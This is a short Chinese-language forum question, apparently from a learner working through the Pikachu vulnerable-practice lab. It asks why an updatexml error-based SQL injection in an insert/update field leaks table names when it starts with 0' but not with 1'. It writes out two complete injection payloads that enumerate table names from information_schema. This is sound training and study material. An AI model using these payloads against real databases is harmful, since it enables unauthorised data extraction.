pikachu insert/update注入为什么使用下列语句可以正常爆表名?
0' or updatexml(0,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='pikachu'),1,31)),1) or '
而将0替换成1就不行了,就直接修改成功了,请问是为啥呢?
1' or updatexml(0,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='pikachu'),1,31)),1) or '
前后结果对比